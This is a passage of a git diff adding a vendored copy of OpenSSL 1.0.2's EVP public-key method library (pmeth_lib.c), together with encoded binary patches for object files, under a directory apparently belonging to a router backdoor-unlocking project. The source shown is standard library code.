zT_S@p$A&cp`8me9{dXB}g@nh(^X5|+qx@3>|Az5y#(Dl=?x6f2<2;A(YD1o9+{z=6
zy$`tCKJ2Z)4^`ktDsYmXQnfK<G$kjAmPw?tN^*!qo{cN<XClul=|m<mHL9kR@zl6R
zlxXZ|M>wV&?e6Z2^eg@0j#xw?k=|Y<ozoOGlbOzJRxOc~I#ZgAWK^{@n^5OAylgnP
zVM(a7|Co|hwXy(_joM6oF|DLQhsh|`+e{`jhZ`=v;cjHQWFEp(rV>d77E2H{aAAD7
zoF%o)WI3^3NKvv{A~~TX$0n4K#5feF9ymj6SR?VfcME<wV0#}SG?6dccoV<j;C>i$
zJKN!0v7w!McsPH~!JU4stC`6=`Og*P*B#vH_d%AYqTdf4e1{{RFB}~6naBB)gJW&r
ze8s`HJNT-D-|ygctOQ~__+8_6Bp72uHKuCKTdmI$=XEJAa9(H90_Sz(yuf+g_(0&i
zZWIO1>&Ev2=XK+{z<J%cC2(Fhh@739(h@_^YZ<#A<D-l^nUFPgRwMFoLQ4>ND4Qj6
za(Ze?O#w?yYpM))`hF{i*?csWlhc{$w3^Z8h-_I<$CME$3o47?|8)|mV~UA4PdhMd
zyM(KarK7zFpF82fGjE5-*)FlG=`2&&0*g50Hx@tdJ&X%($O#cJ<D&n4%%&)QyZRyK
zKgjI!j_W_h0qePc-X8?c$4=3g#ef8TF8eeL@OF28H*jr%=}S0qG`@cv4Z#5Yi~1Lt
zezOpqsDBc4-OjHK4-DE3yCXP7U9Qj1&&@ZgETd6q3oJ1FTgYu7=lXb$yKU7m_LD~u
W;uod_Ym=LPGy5MpiOw8N)c+5fWtSHK

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/pmeth_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/pmeth_lib.c
new file mode 100644
index 0000000..9f81d10
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/pmeth_lib.c
@@ -0,0 +1,613 @@
+/* pmeth_lib.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include "cryptlib.h"
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+#include "asn1_locl.h"
+#include "evp_locl.h"
+
+typedef int sk_cmp_fn_type(const char *const *a, const char *const *b);
+
+DECLARE_STACK_OF(EVP_PKEY_METHOD)
+STACK_OF(EVP_PKEY_METHOD) *app_pkey_methods = NULL;
+
+extern const EVP_PKEY_METHOD rsa_pkey_meth, dh_pkey_meth, dsa_pkey_meth;
+extern const EVP_PKEY_METHOD ec_pkey_meth, hmac_pkey_meth, cmac_pkey_meth;
+extern const EVP_PKEY_METHOD dhx_pkey_meth;
+
+static const EVP_PKEY_METHOD *standard_methods[] = {
+#ifndef OPENSSL_NO_RSA
+    &rsa_pkey_meth,
+#endif
+#ifndef OPENSSL_NO_DH
+    &dh_pkey_meth,
+#endif
+#ifndef OPENSSL_NO_DSA
+    &dsa_pkey_meth,
+#endif
+#ifndef OPENSSL_NO_EC
+    &ec_pkey_meth,
+#endif
+    &hmac_pkey_meth,
+    &cmac_pkey_meth,
+#ifndef OPENSSL_NO_DH
+    &dhx_pkey_meth
+#endif
+};
+
+DECLARE_OBJ_BSEARCH_CMP_FN(const EVP_PKEY_METHOD *, const EVP_PKEY_METHOD *,
+                           pmeth);
+
+static int pmeth_cmp(const EVP_PKEY_METHOD *const *a,
+                     const EVP_PKEY_METHOD *const *b)
+{
+    return ((*a)->pkey_id - (*b)->pkey_id);
+}
+
+IMPLEMENT_OBJ_BSEARCH_CMP_FN(const EVP_PKEY_METHOD *, const EVP_PKEY_METHOD *,
+                             pmeth);
+
+const EVP_PKEY_METHOD *EVP_PKEY_meth_find(int type)
+{
+    EVP_PKEY_METHOD tmp;
+    const EVP_PKEY_METHOD *t = &tmp, **ret;
+    tmp.pkey_id = type;
+    if (app_pkey_methods) {
+        int idx;
+        idx = sk_EVP_PKEY_METHOD_find(app_pkey_methods, &tmp);
+        if (idx >= 0)
+            return sk_EVP_PKEY_METHOD_value(app_pkey_methods, idx);
+    }
+    ret = OBJ_bsearch_pmeth(&t, standard_methods,
+                            sizeof(standard_methods) /
+                            sizeof(EVP_PKEY_METHOD *));
+    if (!ret || !*ret)
+        return NULL;
+    return *ret;
+}
+
+static EVP_PKEY_CTX *int_ctx_new(EVP_PKEY *pkey, ENGINE *e, int id)
+{
+    EVP_PKEY_CTX *ret;
+    const EVP_PKEY_METHOD *pmeth;
+    if (id == -1) {
+        if (!pkey || !pkey->ameth)
+            return NULL;
+        id = pkey->ameth->pkey_id;
+    }
+#ifndef OPENSSL_NO_ENGINE
+    if (pkey && pkey->engine)
+        e = pkey->engine;
+    /* Try to find an ENGINE which implements this method */
+    if (e) {
+        if (!ENGINE_init(e)) {
+            EVPerr(EVP_F_INT_CTX_NEW, ERR_R_ENGINE_LIB);
+            return NULL;
+        }
+    } else
+        e = ENGINE_get_pkey_meth_engine(id);
+
+    /*
+     * If an ENGINE handled this method look it up. Othewise use internal
+     * tables.
+     */
+
+    if (e)
+        pmeth = ENGINE_get_pkey_meth(e, id);
+    else
+#endif
+        pmeth = EVP_PKEY_meth_find(id);
+
+    if (pmeth == NULL) {
+        EVPerr(EVP_F_INT_CTX_NEW, EVP_R_UNSUPPORTED_ALGORITHM);
+        return NULL;
+    }
+
+    ret = OPENSSL_malloc(sizeof(EVP_PKEY_CTX));
+    if (!ret) {
+#ifndef OPENSSL_NO_ENGINE
+        if (e)
+            ENGINE_finish(e);
+#endif
+        EVPerr(EVP_F_INT_CTX_NEW, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    ret->engine = e;
+    ret->pmeth = pmeth;
+    ret->operation = EVP_PKEY_OP_UNDEFINED;
+    ret->pkey = pkey;
+    ret->peerkey = NULL;
+    ret->pkey_gencb = 0;
+    if (pkey)
+        CRYPTO_add(&pkey->references, 1, CRYPTO_LOCK_EVP_PKEY);
+    ret->data = NULL;
+
+    if (pmeth->init) {
+        if (pmeth->init(ret) <= 0) {
+            EVP_PKEY_CTX_free(ret);
+            return NULL;
+        }
+    }
+
+    return ret;
+}
+
+EVP_PKEY_METHOD *EVP_PKEY_meth_new(int id, int flags)
+{
+    EVP_PKEY_METHOD *pmeth;
+    pmeth = OPENSSL_malloc(sizeof(EVP_PKEY_METHOD));
+    if (!pmeth)
+        return NULL;
+
+    memset(pmeth, 0, sizeof(EVP_PKEY_METHOD));
+
+    pmeth->pkey_id = id;
+    pmeth->flags = flags | EVP_PKEY_FLAG_DYNAMIC;
+
+    pmeth->init = 0;
+    pmeth->copy = 0;
+    pmeth->cleanup = 0;
+    pmeth->paramgen_init = 0;
+    pmeth->paramgen = 0;
+    pmeth->keygen_init = 0;
+    pmeth->keygen = 0;
+    pmeth->sign_init = 0;
+    pmeth->sign = 0;
+    pmeth->verify_init = 0;
+    pmeth->verify = 0;
+    pmeth->verify_recover_init = 0;
+    pmeth->verify_recover = 0;
+    pmeth->signctx_init = 0;
+    pmeth->signctx = 0;
+    pmeth->verifyctx_init = 0;
+    pmeth->verifyctx = 0;
+    pmeth->encrypt_init = 0;
+    pmeth->encrypt = 0;
+    pmeth->decrypt_init = 0;
+    pmeth->decrypt = 0;
+    pmeth->derive_init = 0;
+    pmeth->derive = 0;
+    pmeth->ctrl = 0;
+    pmeth->ctrl_str = 0;
+
+    return pmeth;
+}
+
+void EVP_PKEY_meth_get0_info(int *ppkey_id, int *pflags,
+                             const EVP_PKEY_METHOD *meth)
+{
+    if (ppkey_id)
+        *ppkey_id = meth->pkey_id;
+    if (pflags)
+        *pflags = meth->flags;
+}
+
+void EVP_PKEY_meth_copy(EVP_PKEY_METHOD *dst, const EVP_PKEY_METHOD *src)
+{
+
+    dst->init = src->init;
+    dst->copy = src->copy;
+    dst->cleanup = src->cleanup;
+
+    dst->paramgen_init = src->paramgen_init;
+    dst->paramgen = src->paramgen;
+
+    dst->keygen_init = src->keygen_init;
+    dst->keygen = src->keygen;
+
+    dst->sign_init = src->sign_init;
+    dst->sign = src->sign;
+
+    dst->verify_init = src->verify_init;
+    dst->verify = src->verify;
+
+    dst->verify_recover_init = src->verify_recover_init;
+    dst->verify_recover = src->verify_recover;
+
+    dst->signctx_init = src->signctx_init;
+    dst->signctx = src->signctx;
+
+    dst->verifyctx_init = src->verifyctx_init;
+    dst->verifyctx = src->verifyctx;
+
+    dst->encrypt_init = src->encrypt_init;
+    dst->encrypt = src->encrypt;
+
+    dst->decrypt_init = src->decrypt_init;
+    dst->decrypt = src->decrypt;
+
+    dst->derive_init = src->derive_init;
+    dst->derive = src->derive;
+
+    dst->ctrl = src->ctrl;
+    dst->ctrl_str = src->ctrl_str;
+}
+
+void EVP_PKEY_meth_free(EVP_PKEY_METHOD *pmeth)
+{
+    if (pmeth && (pmeth->flags & EVP_PKEY_FLAG_DYNAMIC))
+        OPENSSL_free(pmeth);
+}
+
+EVP_PKEY_CTX *EVP_PKEY_CTX_new(EVP_PKEY *pkey, ENGINE *e)
+{
+    return int_ctx_new(pkey, e, -1);
+}
+
+EVP_PKEY_CTX *EVP_PKEY_CTX_new_id(int id, ENGINE *e)
+{
+    return int_ctx_new(NULL, e, id);
+}
+
+EVP_PKEY_CTX *EVP_PKEY_CTX_dup(EVP_PKEY_CTX *pctx)
+{
+    EVP_PKEY_CTX *rctx;
+    if (!pctx->pmeth || !pctx->pmeth->copy)
+        return NULL;
+#ifndef OPENSSL_NO_ENGINE
+    /* Make sure it's safe to copy a pkey context using an ENGINE */
+    if (pctx->engine && !ENGINE_init(pctx->engine)) {
+        EVPerr(EVP_F_EVP_PKEY_CTX_DUP, ERR_R_ENGINE_LIB);
+        return 0;
+    }
+#endif
+    rctx = OPENSSL_malloc(sizeof(EVP_PKEY_CTX));
+    if (!rctx)
+        return NULL;
+
+    rctx->pmeth = pctx->pmeth;
+#ifndef OPENSSL_NO_ENGINE
+    rctx->engine = pctx->engine;
+#endif
+
+    if (pctx->pkey)
+        CRYPTO_add(&pctx->pkey->references, 1, CRYPTO_LOCK_EVP_PKEY);
+
+    rctx->pkey = pctx->pkey;
+
+    if (pctx->peerkey)
+        CRYPTO_add(&pctx->peerkey->references, 1, CRYPTO_LOCK_EVP_PKEY);
+
+    rctx->peerkey = pctx->peerkey;
+
+    rctx->data = NULL;
+    rctx->app_data = NULL;
+    rctx->operation = pctx->operation;
+
+    if (pctx->pmeth->copy(rctx, pctx) > 0)
+        return rctx;
+
+    EVP_PKEY_CTX_free(rctx);
+    return NULL;
+
+}
+
+int EVP_PKEY_meth_add0(const EVP_PKEY_METHOD *pmeth)
+{
+    if (app_pkey_methods == NULL) {
+        app_pkey_methods = sk_EVP_PKEY_METHOD_new(pmeth_cmp);
+        if (!app_pkey_methods)
+            return 0;
+    }
+    if (!sk_EVP_PKEY_METHOD_push(app_pkey_methods, pmeth))
+        return 0;
+    sk_EVP_PKEY_METHOD_sort(app_pkey_methods);
+    return 1;
+}
+
+void EVP_PKEY_CTX_free(EVP_PKEY_CTX *ctx)
+{
+    if (ctx == NULL)
+        return;
+    if (ctx->pmeth && ctx->pmeth->cleanup)
+        ctx->pmeth->cleanup(ctx);
+    if (ctx->pkey)
+        EVP_PKEY_free(ctx->pkey);
+    if (ctx->peerkey)
+        EVP_PKEY_free(ctx->peerkey);
+#ifndef OPENSSL_NO_ENGINE
+    if (ctx->engine)
+        /*
+         * The EVP_PKEY_CTX we used belongs to an ENGINE, release the
+         * functional reference we held for this reason.
+         */
+        ENGINE_finish(ctx->engine);
+#endif
+    OPENSSL_free(ctx);
+}
+
+int EVP_PKEY_CTX_ctrl(EVP_PKEY_CTX *ctx, int keytype, int optype,
+                      int cmd, int p1, void *p2)
+{
+    int ret;
+    if (!ctx || !ctx->pmeth || !ctx->pmeth->ctrl) {
+        EVPerr(EVP_F_EVP_PKEY_CTX_CTRL, EVP_R_COMMAND_NOT_SUPPORTED);
+        return -2;
+    }
+    if ((keytype != -1) && (ctx->pmeth->pkey_id != keytype))
+        return -1;
+
+    if (ctx->operation == EVP_PKEY_OP_UNDEFINED) {
+        EVPerr(EVP_F_EVP_PKEY_CTX_CTRL, EVP_R_NO_OPERATION_SET);
+        return -1;
+    }
+
+    if ((optype != -1) && !(ctx->operation & optype)) {
+        EVPerr(EVP_F_EVP_PKEY_CTX_CTRL, EVP_R_INVALID_OPERATION);
+        return -1;
+    }
+
+    ret = ctx->pmeth->ctrl(ctx, cmd, p1, p2);
+
+    if (ret == -2)
+        EVPerr(EVP_F_EVP_PKEY_CTX_CTRL, EVP_R_COMMAND_NOT_SUPPORTED);
+
+    return ret;
+
+}
+
+int EVP_PKEY_CTX_ctrl_str(EVP_PKEY_CTX *ctx,
+                          const char *name, const char *value)
+{
+    if (!ctx || !ctx->pmeth || !ctx->pmeth->ctrl_str) {
+        EVPerr(EVP_F_EVP_PKEY_CTX_CTRL_STR, EVP_R_COMMAND_NOT_SUPPORTED);
+        return -2;
+    }
+    if (!strcmp(name, "digest")) {
+        const EVP_MD *md;
+        if (!value || !(md = EVP_get_digestbyname(value))) {
+            EVPerr(EVP_F_EVP_PKEY_CTX_CTRL_STR, EVP_R_INVALID_DIGEST);
+            return 0;
+        }
+        return EVP_PKEY_CTX_set_signature_md(ctx, md);
+    }
+    return ctx->pmeth->ctrl_str(ctx, name, value);
+}
+
+int EVP_PKEY_CTX_get_operation(EVP_PKEY_CTX *ctx)
+{
+    return ctx->operation;
+}
+
+void EVP_PKEY_CTX_set0_keygen_info(EVP_PKEY_CTX *ctx, int *dat, int datlen)
+{
+    ctx->keygen_info = dat;
+    ctx->keygen_info_count = datlen;
+}
+
+void EVP_PKEY_CTX_set_data(EVP_PKEY_CTX *ctx, void *data)
+{
+    ctx->data = data;
+}
+
+void *EVP_PKEY_CTX_get_data(EVP_PKEY_CTX *ctx)
+{
+    return ctx->data;
+}
+
+EVP_PKEY *EVP_PKEY_CTX_get0_pkey(EVP_PKEY_CTX *ctx)
+{
+    return ctx->pkey;
+}
+
+EVP_PKEY *EVP_PKEY_CTX_get0_peerkey(EVP_PKEY_CTX *ctx)
+{
+    return ctx->peerkey;
+}
+
+void EVP_PKEY_CTX_set_app_data(EVP_PKEY_CTX *ctx, void *data)
+{
+    ctx->app_data = data;
+}
+
+void *EVP_PKEY_CTX_get_app_data(EVP_PKEY_CTX *ctx)
+{
+    return ctx->app_data;
+}
+
+void EVP_PKEY_meth_set_init(EVP_PKEY_METHOD *pmeth,
+                            int (*init) (EVP_PKEY_CTX *ctx))
+{
+    pmeth->init = init;
+}
+
+void EVP_PKEY_meth_set_copy(EVP_PKEY_METHOD *pmeth,
+                            int (*copy) (EVP_PKEY_CTX *dst,
+                                         EVP_PKEY_CTX *src))
+{
+    pmeth->copy = copy;
+}
+
+void EVP_PKEY_meth_set_cleanup(EVP_PKEY_METHOD *pmeth,
+                               void (*cleanup) (EVP_PKEY_CTX *ctx))
+{
+    pmeth->cleanup = cleanup;
+}
+
+void EVP_PKEY_meth_set_paramgen(EVP_PKEY_METHOD *pmeth,
+                                int (*paramgen_init) (EVP_PKEY_CTX *ctx),
+                                int (*paramgen) (EVP_PKEY_CTX *ctx,
+                                                 EVP_PKEY *pkey))
+{
+    pmeth->paramgen_init = paramgen_init;
+    pmeth->paramgen = paramgen;
+}
+
+void EVP_PKEY_meth_set_keygen(EVP_PKEY_METHOD *pmeth,
+                              int (*keygen_init) (EVP_PKEY_CTX *ctx),
+                              int (*keygen) (EVP_PKEY_CTX *ctx,
+                                             EVP_PKEY *pkey))
+{
+    pmeth->keygen_init = keygen_init;
+    pmeth->keygen = keygen;
+}
+
+void EVP_PKEY_meth_set_sign(EVP_PKEY_METHOD *pmeth,
+                            int (*sign_init) (EVP_PKEY_CTX *ctx),
+                            int (*sign) (EVP_PKEY_CTX *ctx,
+                                         unsigned char *sig, size_t *siglen,
+                                         const unsigned char *tbs,
+                                         size_t tbslen))
+{
+    pmeth->sign_init = sign_init;
+    pmeth->sign = sign;
+}
+
+void EVP_PKEY_meth_set_verify(EVP_PKEY_METHOD *pmeth,
+                              int (*verify_init) (EVP_PKEY_CTX *ctx),
+                              int (*verify) (EVP_PKEY_CTX *ctx,
+                                             const unsigned char *sig,
+                                             size_t siglen,
+                                             const unsigned char *tbs,
+                                             size_t tbslen))
+{
+    pmeth->verify_init = verify_init;
+    pmeth->verify = verify;
+}
+
+void EVP_PKEY_meth_set_verify_recover(EVP_PKEY_METHOD *pmeth,
+                                      int (*verify_recover_init) (EVP_PKEY_CTX
+                                                                  *ctx),
+                                      int (*verify_recover) (EVP_PKEY_CTX
+                                                             *ctx,
+                                                             unsigned char
+                                                             *sig,
+                                                             size_t *siglen,
+                                                             const unsigned
+                                                             char *tbs,
+                                                             size_t tbslen))
+{
+    pmeth->verify_recover_init = verify_recover_init;
+    pmeth->verify_recover = verify_recover;
+}
+
+void EVP_PKEY_meth_set_signctx(EVP_PKEY_METHOD *pmeth,
+                               int (*signctx_init) (EVP_PKEY_CTX *ctx,
+                                                    EVP_MD_CTX *mctx),
+                               int (*signctx) (EVP_PKEY_CTX *ctx,
+                                               unsigned char *sig,
+                                               size_t *siglen,
+                                               EVP_MD_CTX *mctx))
+{
+    pmeth->signctx_init = signctx_init;
+    pmeth->signctx = signctx;
+}
+
+void EVP_PKEY_meth_set_verifyctx(EVP_PKEY_METHOD *pmeth,
+                                 int (*verifyctx_init) (EVP_PKEY_CTX *ctx,
+                                                        EVP_MD_CTX *mctx),
+                                 int (*verifyctx) (EVP_PKEY_CTX *ctx,
+                                                   const unsigned char *sig,
+                                                   int siglen,
+                                                   EVP_MD_CTX *mctx))
+{
+    pmeth->verifyctx_init = verifyctx_init;
+    pmeth->verifyctx = verifyctx;
+}
+
+void EVP_PKEY_meth_set_encrypt(EVP_PKEY_METHOD *pmeth,
+                               int (*encrypt_init) (EVP_PKEY_CTX *ctx),
+                               int (*encryptfn) (EVP_PKEY_CTX *ctx,
+                                                 unsigned char *out,
+                                                 size_t *outlen,
+                                                 const unsigned char *in,
+                                                 size_t inlen))
+{
+    pmeth->encrypt_init = encrypt_init;
+    pmeth->encrypt = encryptfn;
+}
+
+void EVP_PKEY_meth_set_decrypt(EVP_PKEY_METHOD *pmeth,
+                               int (*decrypt_init) (EVP_PKEY_CTX *ctx),
+                               int (*decrypt) (EVP_PKEY_CTX *ctx,
+                                               unsigned char *out,
+                                               size_t *outlen,
+                                               const unsigned char *in,
+                                               size_t inlen))
+{
+    pmeth->decrypt_init = decrypt_init;
+    pmeth->decrypt = decrypt;
+}
+
+void EVP_PKEY_meth_set_derive(EVP_PKEY_METHOD *pmeth,
+                              int (*derive_init) (EVP_PKEY_CTX *ctx),
+                              int (*derive) (EVP_PKEY_CTX *ctx,
+                                             unsigned char *key,
+                                             size_t *keylen))
+{
+    pmeth->derive_init = derive_init;
+    pmeth->derive = derive;
+}
+
+void EVP_PKEY_meth_set_ctrl(EVP_PKEY_METHOD *pmeth,
+                            int (*ctrl) (EVP_PKEY_CTX *ctx, int type, int p1,
+                                         void *p2),
+                            int (*ctrl_str) (EVP_PKEY_CTX *ctx,
+                                             const char *type,
+                                             const char *value))
+{
+    pmeth->ctrl = ctrl;
+    pmeth->ctrl_str = ctrl_str;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/pmeth_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/pmeth_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..87d20bded9b19037a05cce7ad038edf882bf730a
GIT binary patch
literal 9504
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
